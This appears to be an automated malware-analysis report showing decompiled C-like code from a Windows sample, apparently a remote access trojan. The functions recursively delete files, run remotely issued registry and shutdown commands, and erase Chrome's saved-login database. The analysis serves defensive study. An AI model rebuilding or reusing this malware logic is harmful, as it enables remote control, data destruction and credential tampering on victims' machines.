                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E00418144(WCHAR* __ecx) {
                                                                                                				char _v5;
                                                                                                				WCHAR* _v12;
                                                                                                				short _v532;
                                                                                                				short _v1052;
                                                                                                				struct _WIN32_FIND_DATAW _v1644;
                                                                                                				signed int _t52;
                                                                                                				intOrPtr _t53;
                                                                                                				char _t54;
                                                                                                				short _t55;
                                                                                                				signed int _t56;
                                                                                                				intOrPtr _t57;
                                                                                                				char _t58;
                                                                                                				signed int _t63;
                                                                                                				char _t68;
                                                                                                				void _t72;
                                                                                                				void _t73;
                                                                                                				signed int _t78;
                                                                                                				signed int _t84;
                                                                                                				void* _t86;
                                                                                                				intOrPtr* _t89;
                                                                                                				signed short* _t90;
                                                                                                				void* _t91;
                                                                                                				signed int _t95;
                                                                                                				void* _t100;
                                                                                                				void* _t102;
                                                                                                				signed short* _t103;
                                                                                                				void* _t106;
                                                                                                				void* _t107;
                                                                                                				signed int _t108;
                                                                                                				intOrPtr* _t110;
                                                                                                				void* _t112;
                                                                                                				void* _t118;
                                                                                                				void* _t120;
                                                                                                				void* _t123;
                                                                                                				void* _t124;
                                                                                                
                                                                                                				_v12 = __ecx;
                                                                                                				_t103 = __ecx;
                                                                                                				_t118 =  &_v1052 - __ecx;
                                                                                                				do {
                                                                                                					_t52 =  *_t103 & 0x0000ffff;
                                                                                                					 *(_t118 + _t103) = _t52;
                                                                                                					_t103 =  &(_t103[1]);
                                                                                                				} while (_t52 != 0);
                                                                                                				_t89 =  &_v1052 - 2;
                                                                                                				do {
                                                                                                					_t53 =  *((intOrPtr*)(_t89 + 2));
                                                                                                					_t89 = _t89 + 2;
                                                                                                				} while (_t53 != 0);
                                                                                                				_t54 = L"\\*"; // 0x2a005c
                                                                                                				 *_t89 = _t54;
                                                                                                				_t106 =  &_v532 - __ecx;
                                                                                                				_t55 =  *0x466a50; // 0x0
                                                                                                				 *((short*)(_t89 + 4)) = _t55;
                                                                                                				_t90 = __ecx;
                                                                                                				do {
                                                                                                					_t56 =  *_t90 & 0x0000ffff;
                                                                                                					 *(_t106 + _t90) = _t56;
                                                                                                					_t90 =  &(_t90[1]);
                                                                                                				} while (_t56 != 0);
                                                                                                				_t110 =  &_v532 - 2;
                                                                                                				do {
                                                                                                					_t57 =  *((intOrPtr*)(_t110 + 2));
                                                                                                					_t110 = _t110 + 2;
                                                                                                				} while (_t57 != 0);
                                                                                                				_t58 = "\\"; // 0x5c
                                                                                                				 *_t110 = _t58;
                                                                                                				_t86 = FindFirstFileW( &_v1052,  &_v1644);
                                                                                                				if(_t86 == 0xffffffff) {
                                                                                                					L34:
                                                                                                					return 0;
                                                                                                				}
                                                                                                				_t91 = 0;
                                                                                                				do {
                                                                                                					_t63 =  *(_t123 + _t91 - 0x210) & 0x0000ffff;
                                                                                                					_t91 = _t91 + 2;
                                                                                                					 *(_t123 + _t91 - 0x41a) = _t63;
                                                                                                				} while (_t63 != 0);
                                                                                                				_v5 = 1;
                                                                                                				do {
                                                                                                					if(FindNextFileW(_t86,  &_v1644) == 0) {
                                                                                                						if(GetLastError() != 0x12) {
                                                                                                							L33:
                                                                                                							FindClose(_t86);
                                                                                                							goto L34;
                                                                                                						}
                                                                                                						_t68 = 0;
                                                                                                						_v5 = 0;
                                                                                                						goto L23;
                                                                                                					}
                                                                                                					if(E004180CE( &(_v1644.cFileName)) != 0) {
                                                                                                						L22:
                                                                                                						_t68 = _v5;
                                                                                                						goto L23;
                                                                                                					}
                                                                                                					_t107 =  &(_v1644.cFileName);
                                                                                                					_t120 = _t107;
                                                                                                					do {
                                                                                                						_t72 =  *_t107;
                                                                                                						_t107 = _t107 + 2;
                                                                                                					} while (_t72 != 0);
                                                                                                					_t108 = _t107 - _t120;
                                                                                                					_t112 =  &_v532 - 2;
                                                                                                					do {
                                                                                                						_t73 =  *(_t112 + 2);
                                                                                                						_t112 = _t112 + 2;
                                                                                                					} while (_t73 != 0);
                                                                                                					_t95 = _t108 >> 2;
                                                                                                					memcpy(_t112, _t120, _t95 << 2);
                                                                                                					memcpy(_t120 + _t95 + _t95, _t120, _t108 & 0x00000003);
                                                                                                					_t124 = _t124 + 0x18;
                                                                                                					if((_v1644.dwFileAttributes & 0x00000010) == 0) {
                                                                                                						if((_v1644.dwFileAttributes & 0x00000001) != 0) {
                                                                                                							SetFileAttributesW( &_v532, 0x80);
                                                                                                						}
                                                                                                						if(DeleteFileW( &_v532) == 0) {
                                                                                                							goto L33;
                                                                                                						} else {
                                                                                                							_t100 = 0;
                                                                                                							do {
                                                                                                								_t78 =  *(_t123 + _t100 - 0x418) & 0x0000ffff;
                                                                                                								_t100 = _t100 + 2;
                                                                                                								 *(_t123 + _t100 - 0x212) = _t78;
                                                                                                							} while (_t78 != 0);
                                                                                                							goto L22;
                                                                                                						}
                                                                                                					}
                                                                                                					if(E00418144( &_v532) == 0) {
                                                                                                						goto L33;
                                                                                                					}
                                                                                                					RemoveDirectoryW( &_v532);
                                                                                                					_t102 = 0;
                                                                                                					do {
                                                                                                						_t84 =  *(_t123 + _t102 - 0x418) & 0x0000ffff;
                                                                                                						_t102 = _t102 + 2;
                                                                                                						 *(_t123 + _t102 - 0x212) = _t84;
                                                                                                					} while (_t84 != 0);
                                                                                                					goto L22;
                                                                                                					L23:
                                                                                                				} while (_t68 != 0);
                                                                                                				FindClose(_t86);
                                                                                                				return RemoveDirectoryW(_v12);
                                                                                                			}

                                                                                                APIs
                                                                                                • FindFirstFileW.KERNEL32(?,?,0046E250,?), ref: 004181DB
                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 00418212
                                                                                                • RemoveDirectoryW.KERNEL32(?), ref: 0041828C
                                                                                                • FindClose.KERNEL32(00000000), ref: 004182BA
                                                                                                • RemoveDirectoryW.KERNEL32(?), ref: 004182C3
                                                                                                • SetFileAttributesW.KERNEL32(?,00000080), ref: 004182E0
                                                                                                • DeleteFileW.KERNEL32(?), ref: 004182ED
                                                                                                • GetLastError.KERNEL32 ref: 00418315
                                                                                                • FindClose.KERNEL32(00000000), ref: 00418328
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                                                • String ID:
                                                                                                • API String ID: 2341273852-0
                                                                                                • Opcode ID: 7f159fb5ff72aee02b57d84ced2c0041fc73070d10a3a262ab0951adb198760a
                                                                                                • Instruction ID: 9af4a0360b502a14f67a88d27646a8b5d0f81f3ec4db4f48889ca3042f25b490
                                                                                                • Opcode Fuzzy Hash: 7f159fb5ff72aee02b57d84ced2c0041fc73070d10a3a262ab0951adb198760a
                                                                                                • Instruction Fuzzy Hash: 9351E3355002198ACF259FA8CC886FAB375FF54708F4441EEE80997251EF768ECACB58
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 78%
                                                                                                			E00411234(void* __edx, void* __eflags, char _a8) {
                                                                                                				char _v36;
                                                                                                				char _v48;
                                                                                                				char _v52;
                                                                                                				char _v68;
                                                                                                				char _v76;
                                                                                                				char _v80;
                                                                                                				char _v84;
                                                                                                				char _v88;
                                                                                                				char _v92;
                                                                                                				char _v96;
                                                                                                				char _v100;
                                                                                                				struct _SECURITY_ATTRIBUTES _v104;
                                                                                                				char _v108;
                                                                                                				void* _v112;
                                                                                                				char _v120;
                                                                                                				intOrPtr _v124;
                                                                                                				char _v128;
                                                                                                				void* __ebx;
                                                                                                				void* __esi;
                                                                                                				void* __ebp;
                                                                                                				intOrPtr* _t77;
                                                                                                				void* _t88;
                                                                                                				void* _t99;
                                                                                                				void* _t101;
                                                                                                				void* _t102;
                                                                                                				void* _t104;
                                                                                                				signed int _t105;
                                                                                                				void* _t113;
                                                                                                				void* _t120;
                                                                                                				void* _t121;
                                                                                                				void* _t123;
                                                                                                				void* _t127;
                                                                                                				signed short* _t135;
                                                                                                				void* _t137;
                                                                                                				void* _t141;
                                                                                                				void* _t146;
                                                                                                				void* _t150;
                                                                                                				void* _t152;
                                                                                                				void* _t153;
                                                                                                				void* _t155;
                                                                                                				signed int _t156;
                                                                                                				intOrPtr* _t158;
                                                                                                				void* _t160;
                                                                                                				void* _t162;
                                                                                                				void* _t163;
                                                                                                				void* _t165;
                                                                                                				void* _t171;
                                                                                                				void* _t173;
                                                                                                				void* _t174;
                                                                                                				void* _t176;
                                                                                                				void* _t181;
                                                                                                				void* _t182;
                                                                                                				long _t185;
                                                                                                				signed short* _t195;
                                                                                                				void* _t205;
                                                                                                				void* _t217;
                                                                                                				void* _t233;
                                                                                                				void* _t247;
                                                                                                				signed int _t258;
                                                                                                				signed int _t313;
                                                                                                				signed int _t323;
                                                                                                				signed int _t326;
                                                                                                				void* _t328;
                                                                                                				void* _t330;
                                                                                                				void* _t335;
                                                                                                				void* _t337;
                                                                                                				void* _t339;
                                                                                                				signed int _t340;
                                                                                                				void* _t341;
                                                                                                				signed int _t347;
                                                                                                				signed int _t348;
                                                                                                				void* _t351;
                                                                                                				void* _t352;
                                                                                                				void* _t353;
                                                                                                				void* _t356;
                                                                                                				void* _t361;
                                                                                                				void* _t362;
                                                                                                				void* _t364;
                                                                                                				void* _t365;
                                                                                                				void* _t367;
                                                                                                				void* _t368;
                                                                                                				void* _t369;
                                                                                                				void* _t370;
                                                                                                				void* _t372;
                                                                                                				void* _t374;
                                                                                                				void* _t379;
                                                                                                
                                                                                                				_t379 = __eflags;
                                                                                                				_t320 = __edx;
                                                                                                				_push(_t203);
                                                                                                				_t77 = E00401F87( &_a8);
                                                                                                				_push(0xffffffff);
                                                                                                				_t328 = 4;
                                                                                                				_push(_t328);
                                                                                                				_push( &_v52);
                                                                                                				E00404287( &_a8);
                                                                                                				_t351 = (_t348 & 0xfffffff8) - 0x44;
                                                                                                				E004020DE(_t203, _t351, __edx, _t379, 0x46e250);
                                                                                                				_t352 = _t351 - 0x18;
                                                                                                				E004020DE(_t203, _t352, __edx, _t379,  &_v68);
                                                                                                				E00417E68( &_v108, __edx);
                                                                                                				_t353 = _t352 + 0x30;
                                                                                                				_t335 =  *_t77 - 0x35;
                                                                                                				if(_t335 == 0) {
                                                                                                					E00401F5F(_t203,  &_v76);
                                                                                                					__eflags = E004021E7( &_v88) - 1;
                                                                                                					if(__eflags > 0) {
                                                                                                						E00409DFE(_t203,  &_v80, E00401F87(E00401E3B( &_v88, _t320, __eflags, 1)));
                                                                                                					}
                                                                                                					E004020DE(_t203, _t353 - 0x18, _t320, __eflags, E00401E3B( &_v88, _t320, __eflags, 0));
                                                                                                					_t88 = E00401EDD( &_v84);
                                                                                                					_t320 = 1;
                                                                                                					_t217 = _t88;
                                                                                                					L37:
                                                                                                					E00411075(_t217, _t320, _t386);
                                                                                                					L38:
                                                                                                					E00401EE2();
                                                                                                					L39:
                                                                                                					E00401E66( &_v88, _t320);
                                                                                                					E00401FB9();
                                                                                                					E00401FB9();
                                                                                                					return 0;
                                                                                                				}
                                                                                                				_t337 = _t335 - 1;
                                                                                                				if(_t337 == 0) {
                                                                                                					_t99 = E00401F87(E00401E3B( &_v88, __edx, __eflags, 2));
                                                                                                					_t101 = E00401F87(E00401E3B( &_v92, __edx, __eflags, 1));
                                                                                                					_t330 = 0;
                                                                                                					_t102 = E00401E3B( &_v96, __edx, __eflags, 0);
                                                                                                					_t356 = _t353 - 0x18;
                                                                                                					E004020DE(_t203, _t356, _t320, __eflags, _t102);
                                                                                                					_t104 = E00410FE4(_t203, __eflags, _t99);
                                                                                                					_t320 = _t101;
                                                                                                					_t105 = E00410D8B(_t104, _t101);
                                                                                                					_t358 = _t356 + 0x18 - 0x18;
                                                                                                					_t233 = _t356 + 0x18 - 0x18;
                                                                                                					__eflags = _t105;
                                                                                                					if(__eflags == 0) {
                                                                                                						_push("2");
                                                                                                						L33:
                                                                                                						E00402076(_t203, _t233);
                                                                                                						E00404BB7(_t203, 0x46e7b0, _t320, __eflags);
                                                                                                						goto L39;
                                                                                                					}
                                                                                                					_push("1");
                                                                                                					L20:
                                                                                                					E00402076(_t203, _t233);
                                                                                                					E00404BB7(_t203, 0x46e7b0, _t320, __eflags);
                                                                                                					E004020DE(_t203, _t358 - 0x18, _t320, __eflags, E00401E3B( &_v120, _t320, __eflags, _t330));
                                                                                                					_t113 = E00401F87(E00401E3B( &_v128, _t320, __eflags, 1));
                                                                                                					_t320 = 0;
                                                                                                					E00411075(_t113, 0, __eflags);
                                                                                                					goto L39;
                                                                                                				}
                                                                                                				_t339 = _t337 - 1;
                                                                                                				if(_t339 == 0) {
                                                                                                					E00404260(_t203,  &_v80, E00401F87(E00401E3B( &_v88, __edx, __eflags, 1)));
                                                                                                					 *0x46dd58 = GetProcAddress(LoadLibraryA("Shlwapi.dll"), "SHDeleteKeyW");
                                                                                                					_t120 = E00401EDD( &_v84);
                                                                                                					_t121 = E00401E3B( &_v96, _t320, __eflags, 0);
                                                                                                					_t361 = _t353 - 0x18;
                                                                                                					E004020DE(_t203, _t361, _t320, __eflags, _t121);
                                                                                                					_t123 = E00410FE4(_t203, __eflags, _t120);
                                                                                                					_t362 = _t361 + 0x18;
                                                                                                					__eflags =  *0x46dd58(_t123);
                                                                                                					if(__eflags != 0) {
                                                                                                						_t247 = _t362 - 0x18;
                                                                                                						_push("9");
                                                                                                						L12:
                                                                                                						E00402076(_t203, _t247);
                                                                                                						E00404BB7(_t203, 0x46e7b0, _t320, __eflags);
                                                                                                						goto L38;
                                                                                                					}
                                                                                                					_t127 = E0040247B();
                                                                                                					_t340 = 2;
                                                                                                					_t203 = E0041186A( &_v84, "\\", _t127 - _t340);
                                                                                                					__eflags = _t203 - 0xffffffff;
                                                                                                					if(__eflags != 0) {
                                                                                                						_t50 = _t203 + 1; // 0x1
                                                                                                						_push( ~(__eflags > 0) | _t50 * _t340);
                                                                                                						_v100 = E0043021B( ~(__eflags > 0) | _t50 * _t340, _t50 * _t340 >> 0x20, _t340, __eflags);
                                                                                                						_t135 = E00401EDD(E0040746C( &_v84,  &_v36, 0, _t203));
                                                                                                						_t203 = _v112;
                                                                                                						_t323 = _v112 - _t135;
                                                                                                						__eflags = _t323;
                                                                                                						do {
                                                                                                							_t258 =  *_t135 & 0x0000ffff;
                                                                                                							 *(_t323 + _t135) = _t258;
                                                                                                							_t135 = _t135 + _t340;
                                                                                                							__eflags = _t258;
                                                                                                						} while (__eflags != 0);
                                                                                                						E00401EE2();
                                                                                                						_t137 = E00401E3B( &_v96, _t323, __eflags, 0);
                                                                                                						_t364 = _t362 - 0x18;
                                                                                                						E004020DE(_t203, _t364, _t323, __eflags, _t137);
                                                                                                						_t320 = 0;
                                                                                                						__eflags = 0;
                                                                                                						E00411075(_t203, 0, 0);
                                                                                                						E00430224(_t203);
                                                                                                						_t365 = _t364 + 0x1c;
                                                                                                						L28:
                                                                                                						_t247 = _t365 - 0x18;
                                                                                                						_push("8");
                                                                                                						goto L12;
                                                                                                					}
                                                                                                					_t141 = E00401E3B( &_v96, _t320, __eflags, 0);
                                                                                                					_t367 = _t362 - 0x18;
                                                                                                					E004020DE(_t203, _t367, _t320, __eflags, _t141);
                                                                                                					_t320 = 0;
                                                                                                					E00411075(0, 0, __eflags);
                                                                                                					_t365 = _t367 + 0x18;
                                                                                                					goto L28;
                                                                                                				}
                                                                                                				_t341 = _t339 - 1;
                                                                                                				if(_t341 == 0) {
                                                                                                					_t146 = E004374E4(_t144, E00401F87(E00401E3B( &_v88, __edx, __eflags, 3)));
                                                                                                					__eflags = _t146 - _t328;
                                                                                                					if(__eflags == 0) {
                                                                                                						_push( *((intOrPtr*)(E00401F87(E00401E3B( &_v92, __edx, __eflags, _t328)))));
                                                                                                						_t150 = E00401F87(E00401E3B( &_v92, __edx, __eflags, 2));
                                                                                                						_t152 = E00401F87(E00401E3B( &_v96, _t320, __eflags, 1));
                                                                                                						_t330 = 0;
                                                                                                						__eflags = 0;
                                                                                                						_t153 = E00401E3B( &_v100, _t320, 0, 0);
                                                                                                						_t368 = _t353 - 0x18;
                                                                                                						E004020DE(_t203, _t368, _t320, __eflags, _t153);
                                                                                                						_t155 = E00410FE4(_t203, __eflags, _t150);
                                                                                                						_t369 = _t368 + 0x18;
                                                                                                						_t320 = _t152;
                                                                                                						_t156 = E00410C27(_t155, _t152);
                                                                                                					} else {
                                                                                                						__eflags = _t146 - 0xb;
                                                                                                						if(__eflags == 0) {
                                                                                                							_t158 = E00401F87(E00401E3B( &_v92, __edx, __eflags, _t328));
                                                                                                							_t160 = E00401F87(E00401E3B( &_v92, __edx, __eflags, 2));
                                                                                                							_t162 = E00401F87(E00401E3B( &_v96, _t320, __eflags, 1));
                                                                                                							_t330 = 0;
                                                                                                							_t163 = E00401E3B( &_v100, _t320, __eflags, 0);
                                                                                                							_t370 = _t353 - 0x18;
                                                                                                							E004020DE(_t203, _t370, _t320, __eflags, _t163);
                                                                                                							_t165 = E00410FE4(_t203, __eflags, _t160);
                                                                                                							_t320 = _t162;
                                                                                                							_t156 = E00410C6B(_t165, _t162,  *_t158,  *((intOrPtr*)(_t158 + 4)));
                                                                                                							_t369 = _t370 + 0x24;
                                                                                                						} else {
                                                                                                							_push(_t146);
                                                                                                							E00401E3B( &_v92, __edx, __eflags, _t328);
                                                                                                							_push(E0040247B());
                                                                                                							_push(E00401F87(E00401E3B( &_v92, __edx, __eflags, _t328)));
                                                                                                							_t171 = E00401F87(E00401E3B( &_v96, _t320, __eflags, 2));
                                                                                                							_t173 = E00401F87(E00401E3B( &_v100, _t320, __eflags, 1));
                                                                                                							_t330 = 0;
                                                                                                							_t174 = E00401E3B( &_v104, _t320, __eflags, 0);
                                                                                                							_t372 = _t353 - 0x18;
                                                                                                							E004020DE(_t203, _t372, _t320, __eflags, _t174);
                                                                                                							_t176 = E00410FE4(_t203, __eflags, _t171);
                                                                                                							_t320 = _t173;
                                                                                                							_t156 = E00410B37(_t176, _t173);
                                                                                                							_t369 = _t372 + 0x28;
                                                                                                						}
                                                                                                					}
                                                                                                					_t358 = _t369 - 0x18;
                                                                                                					_t233 = _t369 - 0x18;
                                                                                                					__eflags = _t156;
                                                                                                					if(__eflags == 0) {
                                                                                                						_push("5");
                                                                                                						goto L33;
                                                                                                					} else {
                                                                                                						_push("4");
                                                                                                						goto L20;
                                                                                                					}
                                                                                                				}
                                                                                                				_t384 = _t341 != 1;
                                                                                                				if(_t341 != 1) {
                                                                                                					goto L39;
                                                                                                				}
                                                                                                				E00404260(_t203,  &_v80, E00401F87(E00401E3B( &_v88, __edx, _t384, 1)));
                                                                                                				_t181 = E00401EDD( &_v84);
                                                                                                				_t182 = E00401E3B( &_v96, __edx, _t384, 0);
                                                                                                				_t374 = _t353 - 0x18;
                                                                                                				E004020DE(_t203, _t374, __edx, _t384, _t182);
                                                                                                				_t185 = RegCreateKeyExW(E00410FE4(_t203, _t384, _t181), 0, 0, 0, 0x20006, 0,  &_v104, 0, ??);
                                                                                                				RegCloseKey(_v112);
                                                                                                				_t376 = _t374 + 0x18 - 0x18;
                                                                                                				_t247 = _t374 + 0x18 - 0x18;
                                                                                                				_t385 = _t185;
                                                                                                				if(_t185 != 0) {
                                                                                                					_push("7");
                                                                                                					goto L12;
                                                                                                				}
                                                                                                				E00402076(_t203, _t247, "6");
                                                                                                				_push(0x72);
                                                                                                				E00404BB7(_t203, 0x46e7b0, _t320, _t385);
                                                                                                				_t205 = E00407486( &_v108, 0x46e7b0, 0x46e7b0);
                                                                                                				_t386 = _t205 - 0xffffffff;
                                                                                                				if(_t205 != 0xffffffff) {
                                                                                                					_t14 = _t205 + 1; // 0x1
                                                                                                					_t347 = 2;
                                                                                                					_push( ~(__eflags > 0) | _t14 * _t347);
                                                                                                					_v112 = E0043021B( ~(__eflags > 0) | _t14 * _t347, _t14 * _t347 >> 0x20, _t347, __eflags);
                                                                                                					_t195 = E00401EDD(E0040746C( &_v96,  &_v48, 0, _t205));
                                                                                                					_t206 = _v124;
                                                                                                					_t326 = _v124 - _t195;
                                                                                                					__eflags = _t326;
                                                                                                					do {
                                                                                                						_t313 =  *_t195 & 0x0000ffff;
                                                                                                						 *(_t326 + _t195) = _t313;
                                                                                                						_t195 = _t195 + _t347;
                                                                                                						__eflags = _t313;
                                                                                                					} while (__eflags != 0);
                                                                                                					E00401EE2();
                                                                                                					E004020DE(_t206, _t376 - 0x18, _t326, __eflags, E00401E3B( &_v108, _t326, __eflags, 0));
                                                                                                					_t320 = 0;
                                                                                                					E00411075(_t206, 0, __eflags);
                                                                                                					E00430224(_t206);
                                                                                                					goto L38;
                                                                                                				}
                                                                                                				E004020DE(_t205, _t376 - 0x18, _t320, _t386, E00401E3B( &_v108, _t320, _t386, 0));
                                                                                                				_t320 = 0;
                                                                                                				_t217 = 0;
                                                                                                				goto L37;
                                                                                                			}

                                                                                                APIs
                                                                                                • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 00411309
                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 00411315
                                                                                                  • Part of subcall function 00404BB7: send.WS2_32(?,00000000,00000000,00000000), ref: 00404C2B
                                                                                                • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004115F6
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004115FD
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressCloseCreateLibraryLoadProcsend
                                                                                                • String ID: SHDeleteKeyW$Shlwapi.dll
                                                                                                • API String ID: 2127411465-314212984
                                                                                                • Opcode ID: 922b75aa52d1aa1445c98a431f73a432095eaf022ec6403613f4270da21e3f41
                                                                                                • Instruction ID: 436a36ce1fa38216c9c77c5b74b32b0117a93525e2a20c85ec909f4fbda10a29
                                                                                                • Opcode Fuzzy Hash: 922b75aa52d1aa1445c98a431f73a432095eaf022ec6403613f4270da21e3f41
                                                                                                • Instruction Fuzzy Hash: 0AE12871A0430067CA14B776CC5B9AE76A89F91308F40092FF947B71E2EE7C8945C29B
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 62%
                                                                                                			E0041360B(void* __edx, void* __ebp, void* __eflags, char _a12, char _a16, void* _a128, void* _a152) {
                                                                                                				void* _t12;
                                                                                                				int _t14;
                                                                                                				int _t20;
                                                                                                				int _t22;
                                                                                                				int _t31;
                                                                                                				intOrPtr* _t64;
                                                                                                				void* _t69;
                                                                                                
                                                                                                				_t69 = __eflags;
                                                                                                				E00414367();
                                                                                                				E00401E3B( &_a16, __edx, _t69, 0);
                                                                                                				_t12 = E00405C1B("0");
                                                                                                				_push(0);
                                                                                                				_t70 = _t12;
                                                                                                				if(_t12 == 0) {
                                                                                                					E00401E3B( &_a12, "0", __eflags);
                                                                                                					_t14 = E00405C1B("1");
                                                                                                					_push(0);
                                                                                                					__eflags = _t14;
                                                                                                					if(__eflags == 0) {
                                                                                                						E00401E3B( &_a12, "1", __eflags);
                                                                                                						__eflags = E00405C1B("2");
                                                                                                						if(__eflags == 0) {
                                                                                                							_t64 = GetProcAddress(LoadLibraryA("PowrProf.dll"), "SetSuspendState");
                                                                                                							E00401E3B( &_a16, "2", __eflags, 0);
                                                                                                							_t62 = "3";
                                                                                                							_t20 = E00405C1B("3");
                                                                                                							_push(0);
                                                                                                							__eflags = _t20;
                                                                                                							if(__eflags == 0) {
                                                                                                								E00401E3B( &_a16, "3", __eflags);
                                                                                                								_t62 = "4";
                                                                                                								_t22 = E00405C1B("4");
                                                                                                								__eflags = _t22;
                                                                                                								if(_t22 != 0) {
                                                                                                									_push(0);
                                                                                                									_push(0);
                                                                                                									_push(1);
                                                                                                									goto L11;
                                                                                                								}
                                                                                                							} else {
                                                                                                								_push(0);
                                                                                                								_push(0);
                                                                                                								L11:
                                                                                                								 *_t64();
                                                                                                							}
                                                                                                						} else {
                                                                                                							_push(0);
                                                                                                							_t31 = E004374E4(_t28, E00401F87(E00401E3B( &_a16, "2", __eflags, 1))) | 0x00000002;
                                                                                                							__eflags = _t31;
                                                                                                							goto L6;
                                                                                                						}
                                                                                                					} else {
                                                                                                						_t31 = E004374E4(_t33, E00401F87(E00401E3B( &_a12, "1", __eflags, 1))) | 0x00000001;
                                                                                                						goto L6;
                                                                                                					}
                                                                                                				} else {
                                                                                                					_t31 = E004374E4(_t36, E00401F87(E00401E3B( &_a12, "0", _t70, 1)));
                                                                                                					L6:
                                                                                                					ExitWindowsEx(_t31, ??);
                                                                                                				}
                                                                                                				E00401E66( &_a16, _t62);
                                                                                                				E00401FB9();
                                                                                                				E00401FB9();
                                                                                                				return 0;
                                                                                                			}











                                                                                                APIs
                                                                                                  • Part of subcall function 00414367: GetCurrentProcess.KERNEL32(00000028,?), ref: 00414374
                                                                                                  • Part of subcall function 00414367: OpenProcessToken.ADVAPI32(00000000), ref: 0041437B
                                                                                                  • Part of subcall function 00414367: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0041438D
                                                                                                  • Part of subcall function 00414367: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004143AC
                                                                                                  • Part of subcall function 00414367: GetLastError.KERNEL32 ref: 004143B2
                                                                                                • ExitWindowsEx.USER32(00000000,00000001), ref: 004136AD
                                                                                                • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 004136C2
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004136C9
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                                                                • String ID: PowrProf.dll$SetSuspendState$dhF
                                                                                                • API String ID: 1589313981-768336846
                                                                                                • Opcode ID: 24db37f8f77bbeb8182964a1039d43ad89a956e60e1408e21066733564f16732
                                                                                                • Instruction ID: 0b0ad65eaf52723791abdcf9662898562b440ef97093ca1c4bd3c8b01fd83255
                                                                                                • Opcode Fuzzy Hash: 24db37f8f77bbeb8182964a1039d43ad89a956e60e1408e21066733564f16732
                                                                                                • Instruction Fuzzy Hash: A721B6B061430157CB20BBB29896AAF62599B80309F50093FB547A72D2DE7DCD4A8A5E
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 75%
                                                                                                			E00409F29(void* __edi, void* __eflags) {
                                                                                                				char _v28;
                                                                                                				char _v52;
                                                                                                				void* __ebx;
                                                                                                				void* __ebp;
                                                                                                				long _t18;
                                                                                                				void* _t20;
                                                                                                				void* _t21;
                                                                                                				void* _t28;
                                                                                                				void* _t31;
                                                                                                				void* _t32;
                                                                                                
                                                                                                				_t35 = __eflags;
                                                                                                				_t31 = __edi;
                                                                                                				_t30 = E00402076(_t20,  &_v52, E00437AFA(_t20, __eflags, "UserProfile"));
                                                                                                				E004076BB(_t20,  &_v28, _t7, _t31, _t35, "\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data");
                                                                                                				E00401FB9();
                                                                                                				if(DeleteFileA(E00401F87( &_v28)) != 0) {
                                                                                                					_t28 = _t32 - 0x18;
                                                                                                					_push("\n[Chrome StoredLogins found, cleared!]");
                                                                                                					goto L6;
                                                                                                				} else {
                                                                                                					_t18 = GetLastError();
                                                                                                					if(_t18 == 0 || _t18 == 1) {
                                                                                                						_t28 = _t32 - 0x18;
                                                                                                						_push("\n[Chrome StoredLogins not found]");
                                                                                                						L6:
                                                                                                						E00402076(_t20, _t28);
                                                                                                						E0040A724(_t20, _t30, __eflags);
                                                                                                						_t21 = 1;
                                                                                                					} else {
                                                                                                						_t21 = 0;
                                                                                                					}
                                                                                                				}
                                                                                                				E00401FB9();
                                                                                                				return _t21;
                                                                                                			}














                                                                                                APIs
                                                                                                • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 00409F65
                                                                                                • GetLastError.KERNEL32 ref: 00409F6F
                                                                                                Strings
                                                                                                • [Chrome StoredLogins found, cleared!], xrefs: 00409F95
                                                                                                • UserProfile, xrefs: 00409F35
